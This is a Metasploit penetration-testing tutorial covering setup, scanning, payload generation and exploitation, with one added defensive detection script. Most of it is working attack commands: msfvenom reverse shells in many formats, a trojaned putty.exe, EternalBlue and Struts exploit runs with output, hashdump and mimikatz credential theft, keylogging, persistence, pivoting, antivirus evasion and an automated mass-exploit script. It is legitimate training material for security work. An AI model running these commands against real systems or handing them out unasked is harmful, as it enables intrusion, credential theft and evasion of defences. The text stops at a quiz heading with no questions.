1. Introduction to Metasploit
Metasploit Framework is one of the most popular and powerful penetration testing tools in cybersecurity. First developed by HD Moore in 2003 and now owned by Rapid7, Metasploit provides a complete platform for penetration testing, vulnerability assessment, exploit development, and security research.
Metasploit comes in two main editions: Metasploit Framework (open source, free) and Metasploit Pro (commercial, with extra features such as a GUI, automation, and reporting). For learning, Metasploit Framework is more than sufficient and is available on almost every Linux distribution, including Kali Linux, the default distro for ethical hacking.
Why Metasploit Matters
| Strength | Explanation |
|---|---|
| Largest exploit database | 3,000+ exploits, 2,000+ auxiliary modules, and 1,000+ payloads |
| Modular architecture | Every function lives in its own module, so it is easy to extend and customise |
| Multi-platform | Supports Windows, Linux, macOS, Android, IoT targets and many more |
| Largest community | The largest penetration testing community in the world, with plenty of documentation and tutorials |
| Automation | Resource scripts and RC files to automate complex attack sequences |
| Integration | Integrates with Nmap, Nessus, Burp Suite, and many other tools |
| Industry standard | Used by security professionals, red teams, and blue teams worldwide |
Metasploit is an extremely powerful tool. Use it only on systems you own or have written permission to test. Unauthorised use is a cybercrime and violates the ITE Law (UU ITE) in Indonesia.
Penetration testing workflow:
1. RECON: OSINT, Whois, DNS, Email
2. SCAN: Nmap, db_nmap, Vuln Scan
3. EXPLOIT: Search, Use, Set, Exploit
4. POST EXPLOIT: Shell, Priv, Pivot, Dump
5. REPORT: Logs, Evidence, Report
6. CLEANUP: Remove shells, Clean tracks
7. MITIGATE: Patch vuln, Harden config, Update policy
2. Metasploit Architecture & Components
Metasploit is built on a modular architecture made up of several main kinds of component. Understanding this architecture is essential to using Metasploit effectively.
2.1 Module Types
| Module type | Function | Example |
|---|---|---|
| Exploit | Runs an attack against a vulnerable target | windows/smb/ms17_010_eternalblue |
| Payload | Code that runs after the exploit succeeds | windows/meterpreter/reverse_tcp |
| Auxiliary | Non-exploit functions: scanning, fuzzing, sniffing | scanner/smb/smb_version |
| Post | Post-exploitation modules used once access has been gained | windows/gather/enum_domain |
| Encoder | Encodes the payload to evade AV detection | x86/shikata_ga_nai |
| NOP | No-operation generator for padding | x86/opty2 |
| Evasion | Evasion techniques against AV/EDR | windows/windows_defender_exe |
2.2 Payload Types
- SINGLES (inline / stageless): the complete payload in a single file; it does not need a second connection back to the attacker to fetch a stage; larger in size. Example: windows/shell_reverse_tcp
- STAGERS: a small payload that opens the connection to the listener and receives the stage. Example: windows/meterpreter/reverse_tcp (stager = reverse_tcp)
- STAGES: the main payload, sent after the stager; larger, and executed once the connection is up. Example: windows/meterpreter/reverse_tcp (stage = meterpreter)
Flow: Stager -> connects to the listener -> receives the Stage -> Stage executes -> session active
2.3 Meterpreter: The Premium Payload
Meterpreter is an advanced payload that runs entirely in memory (fileless) and uses encrypted communication. It is the most popular payload in Metasploit because its feature set is so complete:
| Meterpreter feature | Description |
|---|---|
| In-memory execution | Runs entirely in memory and writes no files to disk |
| Encrypted communication | Encrypted channel between handler and session (TLS on the HTTPS transport) |
| Dynamic loading | Extensions can be loaded on demand without restarting the session |
| Multi-session | One exploit can spawn multiple Meterpreter sessions |
| Platform agnostic | Available for Windows, Linux, macOS, Android, Python |
| Migration | Can move into another process for persistence |
| Stealth | Its traffic is harder to detect than that of a plain shell |
3. Installation & Setup
3.1 Installation on Kali Linux
# Kali Linux ships with Metasploit by default
# If it is not installed yet:
sudo apt update && sudo apt install metasploit-framework
# Or use the official installer:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
# Initialize the database (needed for module caching and the data commands)
sudo msfdb init
# Check database status
sudo msfdb status
# Start msfconsole
msfconsole
# Alternative: start with a specific database configuration (-y takes a database.yml path)
msfconsole -y /path/to/database.yml
3.2 Installation on Ubuntu/Debian
# Install dependencies
sudo apt update
sudo apt install -y curl wget gnupg2
# Fetch and run the Rapid7 installer (adds the repository and installs the framework)
curl -fsSL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > /tmp/msfinstall
chmod +x /tmp/msfinstall
sudo /tmp/msfinstall
# Install PostgreSQL (recommended)
sudo apt install -y postgresql postgresql-client
# Start PostgreSQL
sudo systemctl start postgresql
sudo systemctl enable postgresql
# Initialize the Metasploit database
sudo msfdb init
# Verify the installation
msfconsole -q -x "version; exit"
3.3 Database Setup
# ===== DATABASE MANAGEMENT =====
# Initialize the database
sudo msfdb init
# Check database status
sudo msfdb status
# Start/restart the database
sudo msfdb start
sudo msfdb restart
# Delete and reinitialize the database
sudo msfdb delete
sudo msfdb reinit
# ===== INSIDE MSFCONSOLE =====
# Check the database connection
msf6 > db_status
# Reconnect if disconnected
msf6 > db_connect msf:password@localhost/msf
# Workspaces (important for keeping engagements organised)
msf6 > workspace -a project_alpha   # Create a new workspace
msf6 > workspace project_alpha      # Switch to a workspace
msf6 > workspace -l                 # List all workspaces
# ===== DATA MANAGEMENT =====
# Add a host to the database (hosts/services/notes -a replace the older db_add_* commands)
msf6 > hosts -a 192.168.1.100
# Add a service (HTTP, Apache/2.4)
msf6 > services -a -p 80 -s http 192.168.1.100
# Add a note
msf6 > notes -a -t vuln -n "Open redirect vuln" 192.168.1.100
# Export data
msf6 > db_export -f xml /tmp/scan_results.xml
msf6 > db_export -f pwdump /tmp/hashes.txt
4. Fundamental Metasploit Commands
4.1 Navigation & Help
# ===== BASIC MSFCONSOLE COMMANDS =====
# Help and documentation
msf6 > help                  # Show all commands
msf6 > help <command>        # Help for a specific command
msf6 > show -h               # Help for the show command
# ===== SEARCHING FOR MODULES =====
# Search modules by keyword
msf6 > search eternalblue
msf6 > search type:exploit platform:windows
msf6 > search name:smb type:exploit
msf6 > search cve:2017-0144
msf6 > search rank:excellent platform:linux
# Save search results to a file (-o writes CSV)
msf6 > search -o /tmp/eternalblue.csv eternalblue
# ===== USING A MODULE =====
# Select a module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) >
# Show module information
msf6 exploit(ms17_010_eternalblue) > info
# Show the options that need to be set
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > show advanced
# Show compatible payloads
msf6 exploit(ms17_010_eternalblue) > show payloads
# ===== SET PARAMETERS =====
# Set the target
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set RPORT 445
# Set the payload
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Set the listener (LHOST = attacker IP)
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444
# Set a specific target (for multi-target modules)
msf6 exploit(ms17_010_eternalblue) > show targets
msf6 exploit(ms17_010_eternalblue) > set TARGET 0
# Set globally (applies to every module)
msf6 > setg RHOSTS 192.168.1.100
# Unset a parameter
msf6 > unset RHOSTS
msf6 > unsetg RHOSTS         # Unset a global
# Reset all options to their defaults
msf6 > unset all
# ===== RUNNING THE EXPLOIT =====
# Run the exploit
msf6 exploit(ms17_010_eternalblue) > exploit
msf6 exploit(ms17_010_eternalblue) > run      # Alias
# Run as a background job
msf6 exploit(ms17_010_eternalblue) > exploit -j
# Run only the check (tests for the vulnerability without exploiting it)
msf6 exploit(ms17_010_eternalblue) > check
4.2 Session Management
# ===== SESSION MANAGEMENT =====
# List all active sessions
msf6 > sessions -l
# Interact with a specific session
msf6 > sessions -i 1
# Background the session (return to msfconsole)
meterpreter > background
meterpreter > bg
# Or, from msfconsole:
msf6 > sessions -u 1              # Upgrade a plain shell to Meterpreter
# Send a command to a session without interacting
msf6 > sessions -C sysinfo -i 1   # -C runs a Meterpreter command (-c runs a shell command)
# Kill a session
msf6 > sessions -k 1
# Kill all sessions
msf6 > sessions -K
# List sessions with detailed info
msf6 > sessions -v
# ===== SESSION ROUTING =====
# Add a route through a session (pivot)
# This gives access to an internal subnet
msf6 > route add 10.10.10.0/255.255.255.0 1
# Show the routing table
msf6 > route print
# The same route in CIDR notation
msf6 > route add 10.10.10.0/24 1
# Automatic routing through a session: post/multi/manage/autoroute (see 8.2)
# ===== JOB MANAGEMENT =====
# List background jobs
msf6 > jobs -l
# Kill a job
msf6 > jobs -k <id>
# List jobs with details
msf6 > jobs -v
5. Reconnaissance & Scanning
5.1 Nmap Integration
# ===== NMAP DIRECTLY FROM MSFCONSOLE =====
# Basic scan: results go straight into the database
msf6 > db_nmap -sV -sC -O 192.168.1.0/24
# Aggressive scan with default scripts
msf6 > db_nmap -A -T4 192.168.1.100
# UDP scan
msf6 > db_nmap -sU --top-ports 100 192.168.1.100
# Service detection + version
msf6 > db_nmap -sV --version-intensity 5 192.168.1.100
# Vulnerability scan scripts
msf6 > db_nmap --script vuln 192.168.1.100
# Scan specific ports
msf6 > db_nmap -p 21,22,80,443,445,3389 192.168.1.100
# ===== VIEWING SCAN RESULTS =====
# Show discovered hosts
msf6 > hosts
# Show discovered services
msf6 > services
# Filter hosts by OS (-S searches the host fields)
msf6 > hosts -S windows
# Filter services by port
msf6 > services -p 80
# Show vulnerabilities that were found
msf6 > vulns
5.2 Auxiliary Scanner Modules
# ===== AUXILIARY SCANNERS =====
# Find all scanner modules
msf6 > search type:auxiliary name:scanner
# ----- Port Scanner -----
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(tcp) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(tcp) > set THREADS 50
msf6 auxiliary(tcp) > run
# ----- SMB Scanner -----
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 20
msf6 auxiliary(smb_version) > run
# ----- HTTP Scanner -----
msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(http_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(http_version) > set RPORT 80
msf6 auxiliary(http_version) > run
# ----- SSH Scanner -----
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(ssh_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(ssh_version) > run
# ----- FTP Scanner -----
msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(ftp_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(ftp_version) > run
# ----- Directory Scanner -----
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(dir_scanner) > set RHOSTS 192.168.1.100
msf6 auxiliary(dir_scanner) > set DICTIONARY /usr/share/wordlists/dirb/common.txt
msf6 auxiliary(dir_scanner) > run
# ----- Vulnerability Scanner -----
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_ms17_010) > run
# ----- Brute Force -----
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(ssh_login) > set RHOSTS 192.168.1.100
msf6 auxiliary(ssh_login) > set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
msf6 auxiliary(ssh_login) > set THREADS 10
msf6 auxiliary(ssh_login) > run
6. Payloads & Listeners
6.1 Payload Types in Metasploit
# ===== FINDING PAYLOADS =====
# List every payload
msf6 > search type:payload
# Payloads for a specific platform
msf6 > search type:payload platform:windows
msf6 > search type:payload platform:linux
msf6 > search type:payload name:meterpreter
msf6 > search type:payload name:reverse name:tcp
# ===== PAYLOAD CATEGORIES =====
# --- Windows Singles ---
windows/shell_reverse_tcp             # Simple reverse shell
windows/shell_bind_tcp                # Simple bind shell
windows/exec                          # Execute a command
windows/download_exec                 # Download and execute a file
# --- Windows Staged (Meterpreter) ---
windows/meterpreter/reverse_tcp       # Meterpreter reverse (x86)
windows/meterpreter/reverse_https     # Meterpreter reverse HTTPS (stealthier)
windows/meterpreter/bind_tcp          # Meterpreter bind TCP
windows/x64/meterpreter/reverse_tcp   # Meterpreter reverse (x64)
# --- Linux Singles ---
linux/x86/shell_reverse_tcp           # Linux reverse shell (x86)
linux/x64/shell_reverse_tcp           # Linux reverse shell (x64)
# --- Linux Staged (Meterpreter) ---
linux/x86/meterpreter/reverse_tcp     # Linux Meterpreter (x86)
linux/x64/meterpreter/reverse_tcp     # Linux Meterpreter (x64)
# --- Multi-Platform ---
python/meterpreter/reverse_tcp        # Python-based (cross-platform)
java/meterpreter/reverse_tcp          # Java-based (cross-platform)
php/meterpreter/reverse_tcp           # PHP-based (web shells)
# ===== LISTENERS =====
# multi/handler: the universal listener
msf6 > use exploit/multi/handler
msf6 exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(handler) > set LHOST 192.168.1.50
msf6 exploit(handler) > set LPORT 4444
msf6 exploit(handler) > exploit -j        # Run as a background job
6.2 Payload Generation with msfvenom
# ===== MSFVENOM: PAYLOAD GENERATOR =====
# List all payloads
msfvenom -l payloads
# List all formats
msfvenom -l formats
# List all encoders
msfvenom -l encoders
# ===== PAYLOAD GENERATION =====
# --- Windows Reverse Shell (EXE) ---
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f exe -o shell.exe
# --- Windows Reverse Shell (DLL) ---
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f dll -o shell.dll
# --- Windows Reverse Shell (MSI) ---
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f msi -o shell.msi
# --- Linux ELF ---
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f elf -o shell.elf
# --- PHP Web Shell ---
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f raw -o shell.php
# --- ASP Web Shell ---
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f asp -o shell.asp
# --- JSP Web Shell ---
msfvenom -p java/jsp_shell_reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f raw -o shell.jsp
# --- Python Reverse Shell ---
msfvenom -p python/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f raw -o shell.py
# --- PowerShell ---
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f psh -o shell.ps1
# --- Shellcode (raw) ---
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f raw -o shellcode.bin
# --- C Format ---
msfvenom -p windows/shell_reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f c
# --- C# Format ---
msfvenom -p windows/shell_reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f csharp
# ===== WITH ENCODING =====
# Encode with shikata_ga_nai (popular, but well known to AV by now)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-e x86/shikata_ga_nai -i 5 \
-f exe -o encoded_shell.exe
# Fewer iterations of the same encoder
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-e x86/shikata_ga_nai -i 3 \
-f exe -o multi_encoded.exe
# ===== WITH A TEMPLATE =====
# Inject the payload into an existing executable
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-x /path/to/putty.exe -k \
-f exe -o trojan_putty.exe
7. Exploitation
7.1 EternalBlue (MS17-010)
# ===== ETERNALBLUE: EXAMPLE EXPLOITATION =====
# 1. Scan the target for MS17-010
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.100
msf6 auxiliary(smb_ms17_010) > run
# Output: [+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010!
# 2. Load the exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show targets
# 3. Set the options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444
msf6 exploit(ms17_010_eternalblue) > set TARGET 0
# 4. Exploit!
msf6 exploit(ms17_010_eternalblue) > exploit
# [*] Started reverse TCP handler on 192.168.1.50:4444
# [*] Sending stage (200262 bytes) to 192.168.1.100
# [*] Meterpreter session 1 opened (192.168.1.50:4444 -> 192.168.1.100:49152)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > hashdump
7.2 SMB Exploits
# ===== SMB LOGIN BRUTE FORCE =====
msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(smb_login) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_login) > set SMBUser administrator
msf6 auxiliary(smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(smb_login) > set THREADS 10
msf6 auxiliary(smb_login) > run
# ===== PSEXEC: REMOTE COMMAND EXECUTION =====
msf6 > use exploit/windows/smb/psexec
msf6 exploit(psexec) > set RHOSTS 192.168.1.100
msf6 exploit(psexec) > set SMBUser administrator
msf6 exploit(psexec) > set SMBPass Password123
msf6 exploit(psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(psexec) > set LHOST 192.168.1.50
msf6 exploit(psexec) > run
# ===== SMB SHARE SCANNER =====
msf6 > use auxiliary/scanner/smb/smb_enumshares
msf6 auxiliary(smb_enumshares) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_enumshares) > run
# ===== SMB USER ENUM =====
msf6 > use auxiliary/scanner/smb/smb_enumusers
msf6 auxiliary(smb_enumusers) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_enumusers) > run
7.3 Web Application Exploits
# ===== APACHE STRUTS (CVE-2017-5638) =====
msf6 > use exploit/multi/http/struts2_content_type_ognl
msf6 exploit(struts2_content_type_ognl) > set RHOSTS 192.168.1.100
msf6 exploit(struts2_content_type_ognl) > set RPORT 8080
msf6 exploit(struts2_content_type_ognl) > set TARGETURI /action
msf6 exploit(struts2_content_type_ognl) > set PAYLOAD java/meterpreter/reverse_tcp
msf6 exploit(struts2_content_type_ognl) > set LHOST 192.168.1.50
msf6 exploit(struts2_content_type_ognl) > run
# ===== WORDPRESS SCANNER =====
msf6 > use auxiliary/scanner/http/wordpress_scanner
msf6 auxiliary(wordpress_scanner) > set RHOSTS 192.168.1.100
msf6 auxiliary(wordpress_scanner) > run
# ===== TOMCAT MANAGER LOGIN =====
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.1.100
msf6 auxiliary(tomcat_mgr_login) > set RPORT 8080
msf6 auxiliary(tomcat_mgr_login) > run
# ===== HTTP FILE UPLOAD =====
msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 exploit(tomcat_mgr_upload) > set RHOSTS 192.168.1.100
msf6 exploit(tomcat_mgr_upload) > set RPORT 8080
msf6 exploit(tomcat_mgr_upload) > set HttpUsername tomcat
msf6 exploit(tomcat_mgr_upload) > set HttpPassword tomcat
msf6 exploit(tomcat_mgr_upload) > run
8. Post-Exploitation
Once access has been obtained (a Meterpreter session), the next stage is post-exploitation: using that access to gather information, escalate privileges, and maintain access.
8.1 Meterpreter Commands
# ===== SYSTEM INFORMATION =====
meterpreter > sysinfo      # System information
meterpreter > getuid       # Current user
meterpreter > getpid       # Current process ID
meterpreter > ps           # List all processes
meterpreter > env          # Environment variables
# ===== PRIVILEGE ESCALATION =====
meterpreter > getsystem          # Try to escalate to SYSTEM (all techniques)
meterpreter > getsystem -t 1     # Named Pipe Impersonation (In Memory/Admin)
meterpreter > getsystem -t 2     # Named Pipe Impersonation (Dropper/Admin)
# Check privileges
meterpreter > getprivs
# ===== CREDENTIAL HARVESTING =====
# Dump password hashes (SAM database)
meterpreter > hashdump
# Dump credentials from memory (mimikatz via the kiwi extension)
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > creds_msv
meterpreter > creds_kerberos
# Dump NTLM hashes
meterpreter > kiwi_cmd lsadump::sam
# ===== FILE SYSTEM =====
meterpreter > pwd                # Current directory
meterpreter > ls                 # List files
meterpreter > cd C:\\Users       # Change directory
meterpreter > cat file.txt       # Read a file
meterpreter > download file.txt  # Download a file
meterpreter > upload shell.exe   # Upload a file
meterpreter > mkdir newdir       # Create a directory
meterpreter > rm file.txt        # Delete a file
meterpreter > edit file.txt      # Edit a file in a local editor
# ===== PROCESS MANAGEMENT =====
meterpreter > migrate 1234               # Migrate into another process
meterpreter > execute -f cmd.exe -i      # Execute a command (interactive)
meterpreter > kill 1234                  # Kill a process
# ===== NETWORK =====
meterpreter > ipconfig     # Network interfaces
meterpreter > route        # Routing table
meterpreter > netstat      # Network connections
meterpreter > arp          # ARP table
meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.100   # Port forwarding
meterpreter > portfwd list                                 # List port forwards
# ===== SCREENSHOT & KEYLOGGING =====
meterpreter > screenshot      # Take a screenshot
meterpreter > screenshare     # Live screen sharing
meterpreter > keyscan_start   # Start the keylogger
meterpreter > keyscan_dump    # Dump captured keystrokes
meterpreter > keyscan_stop    # Stop the keylogger
# ===== PERSISTENCE =====
# Legacy Meterpreter script (removed from current releases; post/windows/manage/persistence_exe replaces it)
meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.50
# -U: run on user login
# -i: check interval (seconds)
# -p: port
# -r: listener IP
# ===== POST MODULES =====
meterpreter > run post/windows/gather/enum_domain
meterpreter > run post/windows/gather/smart_hashdump
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_network
meterpreter > run post/linux/gather/hashdump
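From the defender's side, the traffic this tutorial produces has recognisable shape: the handler in every example listens on LPORT 4444, a staged Meterpreter connection is immediately followed by a stage-sized download (the EternalBlue output above shows about 200 KB), and the persistence script reconnects on a fixed interval (-i 5). The following script is an added example, not part of the original tutorial or of Metasploit, that scores constructed endpoint network-connection records against those three heuristics; the event format, thresholds and sample data are assumptions made for the example.

```python
"""Heuristic detection of Metasploit-style reverse-shell traffic.

Added example for this tutorial (not Metasploit code). The rules come from
what the tutorial itself shows:
  * the handler in the examples listens on LPORT 4444;
  * a staged payload connects, then immediately receives a large stage
    (the sample output shows "Sending stage (200262 bytes)");
  * the persistence script reconnects on a fixed interval (-i 5).
The event records below are constructed for the example, not real logs.
"""
from collections import defaultdict
from statistics import pstdev

# Constructed sample events: (timestamp_s, process, dst_ip, dst_port, bytes_in)
SAMPLE_EVENTS = [
    (100.0, "chrome.exe",  "142.250.1.1",  443,  52000),
    (101.0, "chrome.exe",  "142.250.1.1",  443,   8000),
    (105.0, "svchost.exe", "192.168.1.50", 4444, 200262),  # stage-sized first transfer
    (110.0, "svchost.exe", "192.168.1.50", 4444,    120),  # 5 s apart: fixed interval
    (115.0, "svchost.exe", "192.168.1.50", 4444,     96),
    (120.0, "svchost.exe", "192.168.1.50", 4444,    110),
    (125.0, "svchost.exe", "192.168.1.50", 4444,    130),
    (300.0, "outlook.exe", "40.97.1.1",    443,  15000),
]

SUSPECT_PORTS = {4444}       # default LPORT used throughout the tutorial (assumed watchlist)
STAGE_MIN_BYTES = 150_000    # assumed lower bound for a Meterpreter stage download
BEACON_MIN_EVENTS = 4        # minimum connections before an interval is judged
BEACON_MAX_JITTER = 1.0      # seconds of standard deviation tolerated on the interval


def detect(events):
    """Group events per (process, dst_ip, dst_port) flow and return a list of
    (process, dst_ip, dst_port, reasons) for every flow that trips a rule."""
    by_flow = defaultdict(list)
    for ts, proc, ip, port, nbytes in sorted(events):
        by_flow[(proc, ip, port)].append((ts, nbytes))

    findings = []
    for (proc, ip, port), recs in by_flow.items():
        reasons = []
        if port in SUSPECT_PORTS:
            reasons.append("known handler port")
        # The first transfer of the flow is where a stager pulls its stage.
        if recs[0][1] >= STAGE_MIN_BYTES:
            reasons.append("stage-sized first transfer")
        # A fixed reconnect interval shows up as near-zero spread in the gaps.
        if len(recs) >= BEACON_MIN_EVENTS:
            gaps = [b[0] - a[0] for a, b in zip(recs, recs[1:])]
            if pstdev(gaps) <= BEACON_MAX_JITTER:
                reasons.append(f"fixed {gaps[0]:.0f}s reconnect interval")
        if reasons:
            findings.append((proc, ip, port, reasons))
    return findings


if __name__ == "__main__":
    for proc, ip, port, reasons in detect(SAMPLE_EVENTS):
        print(f"{proc} -> {ip}:{port}: {', '.join(reasons)}")
```

Only the svchost.exe flow to 192.168.1.50:4444 is reported; the browser and mail traffic on 443 trips none of the rules, which is the point of combining port, size and timing rather than relying on the port alone.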
8.2 Pivoting & Lateral Movement
# ===== PIVOTING: REACHING THE INTERNAL NETWORK =====
# Scenario: you have access to a DMZ server (192.168.1.100)
# and want to reach the internal network (10.10.10.0/24)
# 1. Get a Meterpreter session on the DMZ server
#    (using an exploit as shown earlier)
# 2. Add a route through the session
msf6 > route add 10.10.10.0/255.255.255.0 1     # 1 = session ID
# 3. Verify the route
msf6 > route print
# 4. Start a SOCKS proxy so other tools can use the route
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(socks_proxy) > set SRVPORT 1080
msf6 auxiliary(socks_proxy) > set VERSION 5
msf6 auxiliary(socks_proxy) > run -j
# 5. In another terminal, use proxychains
# Edit /etc/proxychains.conf:
# socks5 127.0.0.1 1080
# The internal network can now be scanned
proxychains nmap -sT -Pn 10.10.10.0/24
# ===== AUTOROUTE =====
# Add routes automatically from a Meterpreter session
msf6 > use post/multi/manage/autoroute
msf6 post(autoroute) > set SESSION 1
msf6 post(autoroute) > run
# ===== PORT FORWARDING =====
# From the Meterpreter session:
meterpreter > portfwd add -l 3389 -p 3389 -r 10.10.10.50
# RDP to 10.10.10.50 is now reachable via localhost:3389
9. Evasion & AV Bypass
# ===== ENCODING PAYLOAD =====
# 1. Single encoder (basic evasion)
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-e x86/shikata_ga_nai -i 5 \
-f exe -o encoded.exe
# 2. A different encoder (add_sub), 3 iterations
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-e x86/add_sub -i 3 \
-f exe -o multi_encoded.exe
# 3. List available encoders
msfvenom -l encoders
# ===== EVASION MODULES =====
# Windows Defender evasion
msf6 > use evasion/windows/windows_defender_exe
msf6 evasion(windows_defender_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 evasion(windows_defender_exe) > set LHOST 192.168.1.50
msf6 evasion(windows_defender_exe) > run
# AppLocker evasion (several modules named applocker_evasion_*; list them with search)
msf6 > search applocker_evasion
# ===== TECHNIQUE TIPS =====
# 1. Use an HTTPS payload (stealthier)
set PAYLOAD windows/x64/meterpreter/reverse_https
set LPORT 443                  # A commonly used port
# 2. Use a custom template
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-x /path/to/legitimate.exe -k \
-f exe -o trojan.exe
# 3. Skip staging (stageless payload)
set PAYLOAD windows/x64/meterpreter_reverse_tcp
# Note: underscore (_) instead of slash (/)
# 4. Compile from source
# Generate C source, then compile with MinGW
# (-f c emits only the byte array; it has to be embedded in a program with a main() before it will compile into a working executable)
msfvenom -p windows/shell_reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 -f c > shell.c
x86_64-w64-mingw32-gcc shell.c -o shell.exe
10. Automation & Resource Scripts
# ===== RESOURCE SCRIPTS (.rc) =====
# A resource script automates a sequence of Metasploit commands
# --- Example: scan_and_exploit.rc ---
# Save as scan_and_exploit.rc
# Set up the workspace
workspace -a automated_scan
# Nmap scan
db_nmap -sV -O --script vuln 192.168.1.0/24
# Set global options
setg RHOSTS 192.168.1.0/24
# Check every host for EternalBlue
use auxiliary/scanner/smb/smb_ms17_010
run
# Exploit vulnerable hosts
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit -j
# Wait for sessions
sleep 10
# Post-exploitation (-C runs a Meterpreter command on the session)
sessions -l
sessions -C sysinfo -i 1
sessions -C getuid -i 1
# Export results
db_export -f xml /tmp/scan_results.xml
# ===== RUNNING A RESOURCE SCRIPT =====
# From the command line:
msfconsole -r scan_and_exploit.rc
# From msfconsole:
msf6 > resource scan_and_exploit.rc
# ===== PERSISTENT HANDLER RESOURCE =====
# Runs a listener that keeps accepting connections
# Save as listener.rc:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set ExitOnSession false
exploit -j -z
# Run it:
msfconsole -r listener.rc
# The listener keeps running even after a session arrives
11. Comprehension Quiz
Test your understanding of Metasploit: